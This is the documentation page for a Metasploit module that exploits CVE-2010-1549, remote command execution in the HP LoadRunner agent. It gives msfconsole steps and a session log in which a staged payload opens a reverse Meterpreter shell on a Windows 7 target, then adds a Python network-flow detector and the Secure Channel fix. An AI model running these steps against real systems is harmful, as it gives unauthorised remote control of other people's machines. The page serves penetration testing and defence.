metasploit-gs/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md
2023-10-10 14:46:18 -04:00

Vulnerable Application

HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)

This module exploits a remote command execution vulnerability in HP LoadRunner before 9.50 and in HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable when the Secure Channel feature is disabled, which is the default.

During testing, additional versions were verified to be vulnerable. The following list documents them:

  • HP LoadRunner 12.53 Community Edition (with SSL turned off, which is a non-default setting)

Required target: HP LoadRunner 9.50 or below, or a version documented above.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
  4. Do: set RHOST [ip]
  5. Do: run
  6. You should get a shell.

Scenarios

Win7 OS with HP LoadRunner 12.53 Community Edition

msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
RHOST => victim
msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] victim:54345 - Sending payload...
[*] victim:54345 - Command Stager progress -   1.47% done (1499/102292 bytes)
[*] victim:54345 - Command Stager progress -   2.93% done (2998/102292 bytes)
[*] victim:54345 - Command Stager progress -   4.40% done (4497/102292 bytes)
[*] victim:54345 - Command Stager progress -   5.86% done (5996/102292 bytes)
[*] victim:54345 - Command Stager progress -   7.33% done (7495/102292 bytes)
...snip...
[*] victim:54345 - Command Stager progress -  92.32% done (94437/102292 bytes)
[*] victim:54345 - Command Stager progress -  93.79% done (95936/102292 bytes)
[*] victim:54345 - Command Stager progress -  95.25% done (97435/102292 bytes)
[*] victim:54345 - Command Stager progress -  96.72% done (98934/102292 bytes)
[*] victim:54345 - Command Stager progress -  98.15% done (100400/102292 bytes)
[*] victim:54345 - Command Stager progress -  99.55% done (101827/102292 bytes)
[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
[*] Sending stage (179267 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100

meterpreter > sysinfo
Computer        : TARGET
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_AU
Domain          : DOMAIN
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
Background session 1? [y/N]
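
A defender-side check for the traffic pattern visible in the session above (a client reaching the agent on port 54345, then the agent host opening a connection back to that client), written as an added example that is not part of the module or its documentation. The flow-record format, the controller allowlist, the five-minute window and all addresses are constructed assumptions.

```python
from datetime import datetime, timedelta

AGENT_PORT = 54345                      # agent port shown in the session output
CONTROLLERS = {"192.0.2.5"}             # assumption: hosts allowed to drive agents
CALLBACK_WINDOW = timedelta(minutes=5)  # assumption: correlation window

# Constructed flow records: "ISO-time src_ip src_port dst_ip dst_port"
SAMPLE_FLOWS = """\
2017-11-09T03:40:00 192.0.2.5 50111 192.0.2.20 54345
2017-11-09T03:52:30 192.0.2.99 50222 192.0.2.20 54345
2017-11-09T03:53:08 192.0.2.20 55556 192.0.2.99 4444
2017-11-09T03:54:00 192.0.2.20 55600 192.0.2.7 443
garbage line
"""

def parse_flows(text):
    """Yield (time, src, sport, dst, dport) tuples; skip malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            yield (datetime.fromisoformat(parts[0]), parts[1], int(parts[2]),
                   parts[3], int(parts[4]))
        except ValueError:
            continue

def find_alerts(text, controllers=CONTROLLERS, window=CALLBACK_WINDOW):
    """Alert on non-controller clients of the agent port; 'high' if the agent calls back."""
    flows = sorted(parse_flows(text))
    alerts = []
    for ts, src, _, dst, dport in flows:
        if dport != AGENT_PORT or src in controllers:
            continue
        # Look for a connection from the agent host back to the same client.
        callback = next(
            (f for f in flows
             if f[1] == dst and f[3] == src and ts <= f[0] <= ts + window),
            None)
        alerts.append({
            "time": ts.isoformat(), "source": src, "agent": dst,
            "severity": "high" if callback else "medium",
            "callback_port": callback[4] if callback else None,
        })
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_FLOWS):
        print(alert)
```

Enabling the Secure Channel feature removes the precondition the page describes; the check above is for finding agents that are still reachable without it.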